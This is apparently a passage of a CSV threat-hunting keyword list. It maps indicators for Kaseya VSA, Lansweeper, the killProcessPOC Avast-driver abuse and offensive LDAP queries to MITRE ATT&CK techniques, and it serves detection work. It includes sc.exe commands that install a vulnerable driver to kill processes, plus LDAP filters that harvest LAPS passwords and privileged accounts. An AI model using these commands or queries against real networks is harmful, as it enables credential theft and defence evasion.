"*\VSAX\working*",".{0,1000}\\VSAX\\working.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\VSAX_x64.msi*",".{0,1000}\\VSAX_x64\.msi.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\vsxrc-clip.exe*",".{0,1000}\\vsxrc\-clip\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*KASEYA HOLDINGS INC.*",".{0,1000}KASEYA\sHOLDINGS\sINC\..{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*managedsupport.kaseya.net*",".{0,1000}managedsupport\.kaseya\.net.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PCMonitorCfg.dll*",".{0,1000}PCMonitorCfg\.dll.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PCMonitorClient.dll*",".{0,1000}PCMonitorClient\.dll.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PCMonitorEng.dll*",".{0,1000}PCMonitorEng\.dll.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PCMonitorManager.exe*",".{0,1000}PCMonitorManager\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PCMonitorManager.exe*",".{0,1000}PCMonitorManager\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PCMONITORMANAGER.EXE-*.pf*",".{0,1000}PCMONITORMANAGER\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PCMonitorSrv.exe*",".{0,1000}PCMonitorSrv\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PCMonitorSrv.exe*",".{0,1000}PCMonitorSrv\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PCMONITORSRV.EXE-*.pf*",".{0,1000}PCMONITORSRV\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PCMonitorSrv.InstallState*",".{0,1000}PCMonitorSrv\.InstallState.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PCMonitorTypes.dll*",".{0,1000}PCMonitorTypes\.dll.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*pcmontask.exe *",".{0,1000}pcmontask\.exe\s.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PCMONTASK.EXE-*.pf*",".{0,1000}PCMONTASK\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*pcmrdp-client.dll*",".{0,1000}pcmrdp\-client\.dll.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Program Files\VSA X\*",".{0,1000}Program\sFiles\\VSA\sX\\.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ProgramData\Kaseya\*",".{0,1000}ProgramData\\Kaseya\\.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemoteDesktop.exe *",".{0,1000}RemoteDesktop\.exe\s.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemoteDesktop_x64 (1).msi*",".{0,1000}RemoteDesktop_x64\s\(1\)\.msi.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*RemoteDesktop_x64.msi*",".{0,1000}RemoteDesktop_x64\.msi.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SC  QUERYEX ""PC Monitor""*",".{0,1000}SC\s\sQUERYEX\s\""PC\sMonitor\"".{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SC  QUERYEX ""VSAX""*",".{0,1000}SC\s\sQUERYEX\s\""VSAX\"".{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'ServiceName'>VSA X</Data>*",".{0,1000}\'ServiceName\'\>VSA\sX\<\/Data\>.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'ServiceName'>VSAX</Data>*",".{0,1000}\'ServiceName\'\>VSAX\<\/Data\>.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'VSA X Manager*",".{0,1000}\'VSA\sX\sManager.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'VSA X Remote Control'*",".{0,1000}\'VSA\sX\sRemote\sControl\'.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'VSA X Service'*",".{0,1000}\'VSA\sX\sService\'.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*'VSA X User Agent'*",".{0,1000}\'VSA\sX\sUser\sAgent\'.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*vsxrc-client.dll*",".{0,1000}vsxrc\-client\.dll.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/killProcessPOC.git*",".{0,1000}\/killProcessPOC\.git.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*\\\\.\\aswSP_ArPot0*",".{0,1000}\\\\\\\\\.\\\\aswSP_ArPot0.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*\\\\.\\aswSP_ArPot1*",".{0,1000}\\\\\\\\\.\\\\aswSP_ArPot1.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*\\\\.\\aswSP_ArPot2*",".{0,1000}\\\\\\\\\.\\\\aswSP_ArPot2.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*\\\\.\\aswSP_ArPot3*",".{0,1000}\\\\\\\\\.\\\\aswSP_ArPot3.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*\\\\.\\aswSP_Avar*",".{0,1000}\\\\\\\\\.\\\\aswSP_Avar.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*\killProcessPOC*",".{0,1000}\\killProcessPOC.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*55ab03a0f7e3ce2c13664db76e5e0b6768cb66d88971b6bc6caf577831a77a23*",".{0,1000}55ab03a0f7e3ce2c13664db76e5e0b6768cb66d88971b6bc6caf577831a77a23.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","#filehash","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*sc.exe create aswSP_ArPot1*",".{0,1000}sc\.exe\screate\saswSP_ArPot1.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*sc.exe create aswSP_ArPot2*",".{0,1000}sc\.exe\screate\saswSP_ArPot2.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*sc.exe create aswSP_ArPot3*",".{0,1000}sc\.exe\screate\saswSP_ArPot3.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*sc.exe create aswSP_ArPots*",".{0,1000}sc\.exe\screate\saswSP_ArPots.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*sc.exe start aswSP_ArPot*",".{0,1000}sc\.exe\sstart\saswSP_ArPot.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*timwhitez/killProcessPOC*",".{0,1000}timwhitez\/killProcessPOC.{0,1000}","greyware_tool_keyword","killProcessPOC","use  Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z"
"*/LansweeperSetup_*.exe*",".{0,1000}\/LansweeperSetup_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","1","N/A","N/A","6","7","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\lansweeper-*",".{0,1000}\\AppData\\Local\\Temp\\lansweeper\-.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","0","N/A","N/A","6","7","N/A","N/A","N/A","N/A"
"*\LansweeperService.exe*",".{0,1000}\\LansweeperService\.exe.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","0","N/A","N/A","6","7","N/A","N/A","N/A","N/A"
"*\LansweeperSetup_*.exe*",".{0,1000}\\LansweeperSetup_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","0","N/A","N/A","6","7","N/A","N/A","N/A","N/A"
"*\Program Files (x86)\Lansweeper*",".{0,1000}\\Program\sFiles\s\(x86\)\\Lansweeper.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","0","N/A","N/A","6","7","N/A","N/A","N/A","N/A"
"*>Lansweeper Setup<*",".{0,1000}\>Lansweeper\sSetup\<.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","0","#description","N/A","6","7","N/A","N/A","N/A","N/A"
"*>Lansweeper<*",".{0,1000}\>Lansweeper\<.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","0","#productname","N/A","6","7","N/A","N/A","N/A","N/A"
"*https://update.lansweeper.com/installation.aspx*",".{0,1000}https\:\/\/update\.lansweeper\.com\/installation\.aspx.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","1","N/A","N/A","6","7","N/A","N/A","N/A","N/A"
"*https://www.lansweeper.com/installation.aspx*",".{0,1000}https\:\/\/www\.lansweeper\.com\/installation\.aspx.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","1","N/A","N/A","6","7","N/A","N/A","N/A","N/A"
"*(&(&(objectCategory=person)(objectClass=user))(|(description=*pass*)(comment=*pass*)))*",".{0,1000}\(\&\(\&\(objectCategory\=person\)\(objectClass\=user\)\)\(\|\(description\=.{0,1000}pass.{0,1000}\)\(comment\=.{0,1000}pass.{0,1000}\)\)\).{0,1000}","greyware_tool_keyword","ldap queries","metasploit enum_ad_user_comments","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726","1","0","N/A","N/A","8","4","N/A","N/A","N/A","N/A"
"*(&(objectCategory=computer)(msDS-isRODC=TRUE))*",".{0,1000}\(\&\(objectCategory\=computer\)\(msDS\-isRODC\=TRUE\)\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate Read-Only Domain Controllers (RODC)","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/mthcht/ThreatHunting-Keywords","1","0","N/A","N/A","8","5","425","51","2024-08-24T11:38:32Z","2023-05-16T15:38:26Z"
"*(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName="" + target + ""))*",".{0,1000}\(\&\(objectCategory\=computer\)\(ms\-MCS\-AdmPwd\=.{0,1000}\)\(sAMAccountName\=\""\s\+\starget\s\+\s\""\)\).{0,1000}","greyware_tool_keyword","ldap queries","LAPS passwords (from SharpLAPS)","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536)(memberOf=CN=Administrators*",".{0,1000}\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=65536\)\(memberOf\=CN\=Administrators.{0,1000}","greyware_tool_keyword","ldap queries","Enumerate Accounts with Non-Expiring Passwords and Administrative Privileges","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/mthcht/ThreatHunting-Keywords","1","0","N/A","N/A","8","5","425","51","2024-08-24T11:38:32Z","2023-05-16T15:38:26Z"
"*(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536)*",".{0,1000}\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=65536\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate all users with the account configuration 'Password never expires'","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*(&(objectClass=group)(managedBy=*)(groupType:1.2.840.113556.1.4.803:=2147483648))*",".{0,1000}\(\&\(objectClass\=group\)\(managedBy\=.{0,1000}\)\(groupType\:1\.2\.840\.113556\.1\.4\.803\:\=2147483648\)\).{0,1000}","greyware_tool_keyword","ldap queries","metasploit  enum_ad_managedby_groups.rb","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/rapid7/metasploit-framework/blob/d37a82500d1d08f9d8ab3da9b194653835748fae/modules/post/windows/gather/enum_ad_managedby_groups.rb#L59","1","0","N/A","N/A","8","10","33672","13869","2024-08-30T12:23:37Z","2011-08-30T06:13:20Z"
